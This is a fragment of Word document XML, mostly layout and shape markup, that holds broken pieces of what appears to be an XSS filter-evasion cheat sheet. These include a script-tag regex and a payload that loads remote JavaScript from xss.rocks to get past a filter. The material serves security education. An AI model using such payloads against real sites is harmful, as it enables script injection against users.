                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 9138 4615"/>
                              <a:gd name="T45" fmla="*/ T44 w 4545"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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45" h="183">
                                <a:moveTo>
                                  <a:pt x="4523" y="182"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22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lnTo>
                                  <a:pt x="4523" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4545" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4545" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4527" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="452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Text Box 585"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4615" y="107"/>
                            <a:ext cx="454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/\&lt;script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\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4" o:spid="_x0000_s1845" style="position:absolute;left:0;text-align:left;margin-left:230.75pt;margin-top:5.35pt;width:227.25pt;height:9.15pt;z-index:15874560;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="4615,107" coordsize="454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">
                <v:shape id="Freeform 586" o:spid="_x0000_s1846" style="position:absolute;left:4615;top:107;width:4545;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="454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462cQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPwWrDMBBE74X8g9hCLyWRW9Jg3MgmBEIKhULcfsBi&#10;bWwTaWUkNbb/vioEchxm5g2zrSZrxJV86B0reFllIIgbp3tuFfx8H5Y5iBCRNRrHpGCmAFW5eNhi&#10;od3IJ7rWsRUJwqFABV2MQyFlaDqyGFZuIE7e2XmLMUnfSu1xTHBr5GuWbaTFntNChwPtO2ou9a9V&#10;8HlcZ5d683WKZja+sfvwbChX6ulx2r2DiDTFe/jW/tAK3vI1/J9JR0C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OtnEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m4523,182l22,182r-4,l,161r,-3l,21,22,,4523,r22,21l4545,161r-18,21l4523,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4523,289;22,289;18,289;0,268;0,265;0,128;22,107;4523,107;4545,128;4545,268;4527,289;4523,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 585" o:spid="_x0000_s1847" type="#_x0000_t202" style="position:absolute;left:4615;top:107;width:454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dNMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmF3nRTQbGpGxGpIBRKYzx4fM0+&#10;kyXZt2l21fTfdwWhx2FmvmFW68G24kq9N44VvEwTEMSl04YrBcdiN1mC8AFZY+uYFPySh3U2Hq0w&#10;1e7GOV0PoRIRwj5FBXUIXSqlL2uy6KeuI47e2fUWQ5R9JXWPtwi3rZwlyUJaNBwXauxoW1PZHC5W&#10;webE+bv5+fz+ys+5KYrXhD8WjVLPT8PmDUSgIfyHH+29VjBfzu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9V00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/\&lt;script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\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Yet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>another</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS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evade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same</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filter,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="76"/>
        <w:ind w:left="190"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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77280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52070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1867535" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="582" name="Freeform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67535" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 4534 1614"/>
                            <a:gd name="T1" fmla="*/ T0 w 2941"/>
                            <a:gd name="T2" fmla="+- 0 264 82"/>
                            <a:gd name="T3" fmla="*/ 264 h 183"/>
                            <a:gd name="T4" fmla="+- 0 1635 1614"/>
                            <a:gd name="T5" fmla="*/ T4 w 2941"/>
                            <a:gd name="T6" fmla="+- 0 264 82"/>
                            <a:gd name="T7" fmla="*/ 264 h 183"/>
                            <a:gd name="T8" fmla="+- 0 1632 1614"/>
                            <a:gd name="T9" fmla="*/ T8 w 2941"/>
                            <a:gd name="T10" fmla="+- 0 264 82"/>
                            <a:gd name="T11" fmla="*/ 264 h 183"/>
                            <a:gd name="T12" fmla="+- 0 1614 1614"/>
                            <a:gd name="T13" fmla="*/ T12 w 2941"/>
                            <a:gd name="T14" fmla="+- 0 243 82"/>
                            <a:gd name="T15" fmla="*/ 243 h 183"/>
                            <a:gd name="T16" fmla="+- 0 1614 1614"/>
                            <a:gd name="T17" fmla="*/ T16 w 2941"/>
                            <a:gd name="T18" fmla="+- 0 240 82"/>
                            <a:gd name="T19" fmla="*/ 240 h 183"/>
                            <a:gd name="T20" fmla="+- 0 1614 1614"/>
                            <a:gd name="T21" fmla="*/ T20 w 2941"/>
                            <a:gd name="T22" fmla="+- 0 103 82"/>
                            <a:gd name="T23" fmla="*/ 103 h 183"/>
                            <a:gd name="T24" fmla="+- 0 1635 1614"/>
                            <a:gd name="T25" fmla="*/ T24 w 2941"/>
                            <a:gd name="T26" fmla="+- 0 82 82"/>
                            <a:gd name="T27" fmla="*/ 82 h 183"/>
                            <a:gd name="T28" fmla="+- 0 4534 1614"/>
                            <a:gd name="T29" fmla="*/ T28 w 2941"/>
                            <a:gd name="T30" fmla="+- 0 82 82"/>
                            <a:gd name="T31" fmla="*/ 82 h 183"/>
                            <a:gd name="T32" fmla="+- 0 4555 1614"/>
                            <a:gd name="T33" fmla="*/ T32 w 2941"/>
                            <a:gd name="T34" fmla="+- 0 103 82"/>
                            <a:gd name="T35" fmla="*/ 103 h 183"/>
                            <a:gd name="T36" fmla="+- 0 4555 1614"/>
                            <a:gd name="T37" fmla="*/ T36 w 2941"/>
                            <a:gd name="T38" fmla="+- 0 243 82"/>
                            <a:gd name="T39" fmla="*/ 243 h 183"/>
                            <a:gd name="T40" fmla="+- 0 4537 1614"/>
                            <a:gd name="T41" fmla="*/ T40 w 2941"/>
                            <a:gd name="T42" fmla="+- 0 264 82"/>
                            <a:gd name="T43" fmla="*/ 264 h 183"/>
                            <a:gd name="T44" fmla="+- 0 4534 1614"/>
                            <a:gd name="T45" fmla="*/ T44 w 2941"/>
                            <a:gd name="T46" fmla="+- 0 264 82"/>
                            <a:gd name="T47" fmla="*/ 264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941" h="183">
                              <a:moveTo>
                                <a:pt x="2920" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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920" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2941" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2941" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2923" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2920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05CEC" id="Freeform 583" o:spid="_x0000_s1026" style="position:absolute;margin-left:80.7pt;margin-top:4.1pt;width:147.05pt;height:9.15pt;z-index:-1754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94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" path="m2920,182l21,182r-3,l,161r,-3l,21,21,,2920,r21,21l2941,161r-18,21l2920,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1854200,167640;13335,167640;11430,167640;0,154305;0,152400;0,65405;13335,52070;1854200,52070;1867535,65405;1867535,154305;1856105,167640;1854200,167640" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:w w:val="95"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>[^'"\&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:w w:val="95"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>\\s\]+))?)+\\s\*|\\s\*)src/i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-37"/>
          <w:w w:val="95"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>.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I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know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I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said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I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wasn't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goint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to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discuss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mitigation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techniques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but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only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thing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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63"/>
        <w:ind w:left="154"/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15875584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3818255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>43815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="579" name="Group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6013" y="69"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="580" name="Freeform 582"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6012" y="69"/>
                            <a:ext cx="742" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6733 6013"/>
                              <a:gd name="T1" fmla="*/ T0 w 742"/>
                              <a:gd name="T2" fmla="+- 0 251 69"/>
                              <a:gd name="T3" fmla="*/ 251 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6034 6013"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 251 69"/>
                              <a:gd name="T7" fmla="*/ 251 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6031 6013"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 251 69"/>
                              <a:gd name="T11" fmla="*/ 251 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6013 6013"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 230 69"/>
                              <a:gd name="T15" fmla="*/ 230 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6013 6013"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 227 69"/>
                              <a:gd name="T19" fmla="*/ 227 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6013 6013"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 90 69"/>
                              <a:gd name="T23" fmla="*/ 90 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6034 6013"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 69 69"/>
                              <a:gd name="T27" fmla="*/ 69 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6733 6013"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 69 69"/>
                              <a:gd name="T31" fmla="*/ 69 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6754 6013"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 90 69"/>
                              <a:gd name="T35" fmla="*/ 90 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6754 6013"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 230 69"/>
                              <a:gd name="T39" fmla="*/ 230 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6736 6013"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 251 69"/>
                              <a:gd name="T43" fmla="*/ 251 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6733 6013"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 251 69"/>
                              <a:gd name="T47" fmla="*/ 25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Text Box 581"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6012" y="69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0" o:spid="_x0000_s1848" style="position:absolute;left:0;text-align:left;margin-left:300.65pt;margin-top:3.45pt;width:37.1pt;height:9.15pt;z-index:15875584;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6013,69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">
                <v:shape id="Freeform 582" o:spid="_x0000_s1849" style="position:absolute;left:6012;top:69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BYcEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/5DuAOzkWnigKKdRhFBfCCIjw+4NHfa&#10;YnNTmlg7fz9ZCC4P550te1uLjlpfOdYwThQI4tyZigsNt+vmawbCB2SDtWPS8EcelovhIMPUuCef&#10;qbuEQsQQ9ilqKENoUil9XpJFn7iGOHK/rrUYImwLaVp8xnBby2+lptJixbGhxIbWJeX3y8Nq2O6P&#10;te9vuLNXnI8Pp7s6diOl9edHv/oBEagPb/HLvTMaJrM4P56JR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MwWHBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,251;21,251;18,251;0,230;0,227;0,90;21,69;720,69;741,90;741,230;723,251;720,251" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 581" o:spid="_x0000_s1850" type="#_x0000_t202" style="position:absolute;left:6012;top:69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5bN8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVems2FhRN3YhIBaFQGuPB42v2&#10;mSzJvo3ZVdN/3y0UPA4z8w2zXI22E1cavHGsYJKkIIgrpw3XCg7l9mUOwgdkjZ1jUvBDHlb548MS&#10;M+1uXNB1H2oRIewzVNCE0GdS+qohiz5xPXH0Tm6wGKIcaqkHvEW47eRrms6kRcNxocGeNg1V7f5i&#10;FayPXLyb8+f3V3EqTFkuUv6YtUo9P43rNxCBxnAP/7d3WsF0PoG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zls3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&lt;SCRIPT&gt;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I've</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>seen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>work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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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still</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>want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allow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="75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73824" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4126865</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>51435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="576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6499" y="81"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="577" name="Freeform 579"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6498" y="81"/>
                            <a:ext cx="742" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7219 6499"/>
                              <a:gd name="T1" fmla="*/ T0 w 742"/>
                              <a:gd name="T2" fmla="+- 0 263 81"/>
                              <a:gd name="T3" fmla="*/ 263 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6520 6499"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 263 81"/>
                              <a:gd name="T7" fmla="*/ 263 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6517 6499"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 263 81"/>
                              <a:gd name="T11" fmla="*/ 263 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6499 6499"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 242 81"/>
                              <a:gd name="T15" fmla="*/ 242 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6499 6499"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 239 81"/>
                              <a:gd name="T19" fmla="*/ 239 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6499 6499"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 102 81"/>
                              <a:gd name="T23" fmla="*/ 102 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6520 6499"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 81 81"/>
                              <a:gd name="T27" fmla="*/ 81 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7219 6499"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 81 81"/>
                              <a:gd name="T31" fmla="*/ 81 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7240 6499"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 102 81"/>
                              <a:gd name="T35" fmla="*/ 102 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7240 6499"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 242 81"/>
                              <a:gd name="T39" fmla="*/ 242 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7222 6499"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 263 81"/>
                              <a:gd name="T43" fmla="*/ 263 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7219 6499"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 263 81"/>
                              <a:gd name="T47" fmla="*/ 26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578"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6498" y="81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3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7" o:spid="_x0000_s1851" style="position:absolute;left:0;text-align:left;margin-left:324.95pt;margin-top:4.05pt;width:37.1pt;height:9.15pt;z-index:-17542656;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6499,81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">
                <v:shape id="Freeform 579" o:spid="_x0000_s1852" style="position:absolute;left:6498;top:81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ApMsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE34X+w3ILfZG6a0FTo6uUQmkqQmn0Ay7Z&#10;2ySYvRuy2yT+fVcQfBxm5gyz2Y22ET11vnasYT5TIIgLZ2ouNZyOH8+vIHxANtg4Jg0X8rDbPkw2&#10;mBo38A/1eShFhLBPUUMVQptK6YuKLPqZa4mj9+s6iyHKrpSmwyHCbSNflFpKizXHhQpbeq+oOOd/&#10;VsPn16Hx4wkze8TVfP99Vod+qrR+ehzf1iACjeEevrUzo2GRJHA9E4+A3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MCkyxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,263;21,263;18,263;0,242;0,239;0,102;21,81;720,81;741,102;741,242;723,263;720,263" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 578" o:spid="_x0000_s1853" type="#_x0000_t202" style="position:absolute;left:6498;top:81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GCjcIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m6mC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IYKN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3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&lt;SCRIPT&gt;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(and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course</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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ways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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>around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allow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="63" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="638" w:right="30" w:hanging="485"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>script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state</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tags):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00AC7743">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1580" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="2" w:space="708" w:equalWidth="0">
            <w:col w:w="5035" w:space="150"/>
            <w:col w:w="3835"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="14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2994025" cy="116205"/>
                <wp:effectExtent l="5715" t="8255" r="635" b="0"/>
                <wp:docPr id="573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025" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4715" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="574" name="Freeform 57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715" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4693 w 4715"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 4715"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 4715"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 4715"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 4715"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 4715"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 4715"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 4693 w 4715"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 4714 w 4715"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 4714 w 4715"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 4696 w 4715"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 4693 w 4715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715" h="183">
                                <a:moveTo>
                                  <a:pt x="469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693" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4714" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4714" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4696" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469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Text Box 57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71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"a='&gt;'"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SRC="httx://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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74" o:spid="_x0000_s1854" style="width:235.75pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="471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">
                <v:shape id="Freeform 576" o:spid="_x0000_s1855" style="position:absolute;width:4715;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="471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vWb8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvOlG0VpSVxFF8WpUSm6P7Gs2&#10;bfZtyK4a/fVuQehxmJlvmNmis7W4UOsrxwqGgwQEceF0xaWC42HT/wDhA7LG2jEpuJGHxfz1ZYap&#10;dlfe0yULpYgQ9ikqMCE0qZS+MGTRD1xDHL1v11oMUbal1C1eI9zWcpQk79JixXHBYEMrQ8VvdrYK&#10;fo73U7fZnoZ5Zur8PFmv8ubrplTvrVt+ggjUhf/ws73TCibTMfydiUd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C9ZvxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4693,182l21,182r-3,l,161r,-3l,21,21,,4693,r21,21l4714,161r-18,21l4693,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4693,182;21,182;18,182;0,161;0,158;0,21;21,0;4693,0;4714,21;4714,161;4696,182;4693,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 575" o:spid="_x0000_s1856" type="#_x0000_t202" style="position:absolute;width:471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AtE8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE7wW/w/KE3upGwT+NriJioSBIY3ro8TX7&#10;TBazb2N2q/HbuwXB4zAzv2EWq87W4kKtN44VDAcJCOLCacOlgu/8420GwgdkjbVjUnAjD6tl72WB&#10;qXZXzuhyCKWIEPYpKqhCaFIpfVGRRT9wDXH0jq61GKJsS6lbvEa4reUoSSbSouG4UGFDm4qK0+HP&#10;Klj/cLY15/3vV3bMTJ6/J7ybnJR67XfrOYhAXXiGH+1PrWA8HcP/mX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IC0T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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
